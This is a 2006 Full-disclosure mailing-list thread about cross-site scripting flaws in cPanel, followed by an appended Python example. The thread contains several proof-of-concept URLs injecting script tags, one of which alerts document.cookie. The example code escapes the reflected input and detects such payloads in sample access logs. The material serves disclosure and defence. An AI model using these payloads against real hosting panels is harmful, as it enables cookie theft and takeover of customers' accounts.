Feb 08, 2006 - 12:00 a.m.

[Full-disclosure] Re: cPanel Multiple Cross Site Scripting Vulnerability

vulners.com

One more for your list:
http://localhost:2095/dowebmailforward.cgi?fwd=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&action=Add+Forwarder

Sumit

On 2/4/06, Hamish Stanaway <[email protected]> wrote:
Hi there,

Thank you for finding this vulnerability in widely used software. I was
wondering if you had a solution or a workaround for this issue?

Kindest of regards,

Hamish Stanaway, CEO

Absolute Web Hosting / -= KoRe WoRkS =- Internet Security
Auckland, New Zealand

http://www.webhosting.net.nz
http://www.buywebhosting.co.nz
http://www.koreworks.com

>From: [email protected]
>To: [email protected]
>Subject: cPanel Multiple Cross Site Scripting Vulnerability
>Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT)
>
>Title: cPanel Multiple Cross Site Scripting
>
>Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
>Discovered: 22 January 2005
>Published: 02 February 2006
>MorX Security Research Team
> http://www.morx.org
>
>Service: Web Hosting Manager
>
>Vendor: cPanel
>
>Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
>
>Severity: Medium/High
>
>Details:
>
>cPanel (control panel) is a graphical web-based management tool, designed
>to make administration of web sites as easy as possible. cPanel handles
>all aspects of website administration in an easy-to-use interface.
>The software, which is proprietary, runs on a number of popular RPM-based
>Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
>Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
>accessed on ports 2082 and 2083 (for an SSL version). Authentication is
>either via HTTP or web page login. cPanel is prone to cross-site scripting
>attacks. This problem is due to a failure in the application to properly
>sanitize user-supplied input.
>
>
>
>Impact:
>
>An attacker can exploit the vulnerable scripts to have arbitrary script
>code executed in the browser of an authenticated cPanel user in the context
>of the website hosting the vulnerable cPanel version, resulting in the
>theft of cookie-based authentication, giving the attacker full access to
>the victim's cPanel account, as well as other types of attacks.
>
>
>Affected scripts with proof of concept exploit:
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email= <script>alert('vul')</script>&domain=
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email= <script>alert('vul')</script>&domain=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0 "><script>alert('vul')</script>
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target= "><script>alert('vul')</script>
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx "><script>alert('vul')</script>&target=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006 "><script>alert('vul')</script>&domain=xxx&target=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan "><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
>
>
>Disclaimer:
>
>This entire document is for educational, testing and demonstration purposes
>only. Modification, use and/or publishing of this information is entirely at
>your OWN risk. The information provided in this advisory is to be
>used/tested on your OWN machine/account. I cannot be held responsible for
>any of the above.
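The advisory attributes the issue to reflecting a request parameter into the page without sanitising it. The following is an added example, not code from this thread or from cPanel, that shows the two things a defender wants from it: the rendering bug beside its fix (HTML-escaping the value in attribute context), and a detection routine that flags requests carrying script payloads in the query string, run over constructed access-log lines in Apache common log format (the format, the IPs and the requests are assumptions; only the cPanel paths come from the thread).

```python
import html
import re
from urllib.parse import unquote_plus, urlsplit


def render_unsafe(email: str) -> str:
    """Reflects the parameter verbatim: the flaw the advisory describes."""
    return f'<input name="email" value="{email}">'


def render_safe(email: str) -> str:
    """Escapes for HTML attribute context, so <, >, &, " and ' become entities."""
    return f'<input name="email" value="{html.escape(email, quote=True)}">'


# Markers of a script payload once the query string has been URL-decoded.
SCRIPT_RE = re.compile(r"<\s*/?\s*script\b|javascript:", re.IGNORECASE)

# Assumed Apache common log format: ip ident user [ts] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def is_xss_probe(url: str) -> bool:
    """True when the decoded query string carries a script marker.

    Decodes twice so a double-encoded payload (%253C...) is still seen.
    """
    query = urlsplit(url).query
    decoded = unquote_plus(unquote_plus(query))
    return bool(SCRIPT_RE.search(decoded))


def flag_xss_attempts(lines):
    """Returns (ip, url) for each parsable log line whose query looks like a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        if is_xss_probe(m.group("url")):
            hits.append((m.group("ip"), m.group("url")))
    return hits


# Constructed sample log: three probes against the paths named in the thread,
# plus one legitimate request to the same script (must not be flagged).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Feb/2006:08:16:33 -0700] "GET /frontend/xcontroller/editquota.html'
    '?email=%3Cscript%3Ealert%28%27vul%27%29%3C%2Fscript%3E&domain= HTTP/1.1" 200 512',
    '203.0.113.7 - - [03/Feb/2006:08:17:01 -0700] "GET /frontend/xcontroller/editquota.html'
    '?email=user%40example.com&domain=example.com HTTP/1.1" 200 512',
    '198.51.100.23 - - [03/Feb/2006:09:02:10 -0700] "GET /dowebmailforward.cgi'
    '?fwd=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&action=Add+Forwarder HTTP/1.1" 200 301',
    '198.51.100.23 - - [03/Feb/2006:09:02:44 -0700] "GET /frontend/xcontroller/diskusage.html'
    '?showtree=0%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900',
]


if __name__ == "__main__":
    payload = "\"><script>alert(1)</script>"
    print("unsafe:", render_unsafe(payload))
    print("safe:  ", render_safe(payload))
    for ip, url in flag_xss_attempts(SAMPLE_LOG):
        print("probe from", ip, "->", url)
```

The escaping fix is context-specific: `html.escape` is correct for text and attribute values, but a value that lands inside a `<script>` block or a URL needs that context's encoding instead. The detector deliberately decodes before matching, since every proof of concept in the thread arrives percent-encoded; matching the raw query would miss them.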